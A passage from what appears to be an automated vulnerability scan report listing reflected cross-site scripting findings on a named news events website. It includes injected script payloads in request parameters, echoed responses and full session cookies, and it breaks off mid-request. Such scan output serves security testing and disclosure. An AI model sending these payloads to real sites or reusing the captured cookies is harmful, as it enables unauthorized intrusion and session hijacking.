fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

4.419. http://events.cbs6albany.com/albany-ny/restaurants [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670ce"><script>alert(1)</script>fe260681d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/restaurants?670ce"><script>alert(1)</script>fe260681d26=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 25
ETag: "2348403be917a7bde13b54cd5737fd69"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:47 GMT; HttpOnly
Content-Length: 42441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/restaurants?670ce"><script>alert(1)</script>fe260681d26=1" />
...[SNIP]...

4.420. http://events.cbs6albany.com/albany-ny/venues [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9fe"><a>3c7d630f61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyfd9fe"><a>3c7d630f61a/venues HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:38:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 271
ETag: "466afeacc611d787d02f6452edcf2726"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZmQ5ZmUiPjxhPjNjN2Q2MzBmNjFhIgpzdGF0ZSIHTlk%3D--155907a72ba339cb1ddf385bbd1bea0bc9449d87; path=/; expires=Fri, 29-Apr-2011 05:38:17 GMT; HttpOnly
Content-Length: 34291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyfd9fe"><a>3c7d630f61a/venues" />
...[SNIP]...

4.421. http://events.cbs6albany.com/albany-ny/venues [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901f7"><script>alert(1)</script>71466104ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 30
ETag: "6797e052dbef6ab0e0d517cf81b533f9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:34 GMT; HttpOnly
Content-Length: 34357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1" />
...[SNIP]...

4.422. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/glens-falls-ny/venues/show/185044-glens-falls-civic-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c2f3"><script>alert(1)</script>52e176f2774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:03:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "b2a71df20cca9ad3b45b4fd377f6f80d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:03:18 GMT; HttpOnly
Content-Length: 60333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1" />
...[SNIP]...

4.423. http://events.cbs6albany.com/movies [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c294"><script>alert(1)</script>4c316537d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?1c294"><script>alert(1)</script>4c316537d45=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:54:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
ETag: "a9a477101eb3fc0dfca5a926a9e99ad2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:54:51 GMT; HttpOnly
Content-Length: 32580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?1c294"><script>alert(1)</script>4c316537d45=1" />
...[SNIP]...

4.424. http://events.cbs6albany.com/movies/show/261885-127-hours [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/261885-127-hours

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8199d"><script>alert(1)</script>27e8499e0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:56:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "f65a2dc5b39034e66f70cc4269aa0aec"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:56:17 GMT; HttpOnly
Content-Length: 41411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1" />
...[SNIP]...

4.425. http://events.cbs6albany.com/movies/show/272945-black-swan [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/272945-black-swan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d205"><script>alert(1)</script>ffdf17a191f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:03:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 84
ETag: "d1cce8e56de3c285c862bc9353acffdd"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:03:33 GMT; HttpOnly
Content-Length: 41624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1" />
...[SNIP]...

4.426. http://events.cbs6albany.com/movies/show/299065-the-kings-speech [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/299065-the-kings-speech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76ea0"><script>alert(1)</script>a87ae6cc1e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
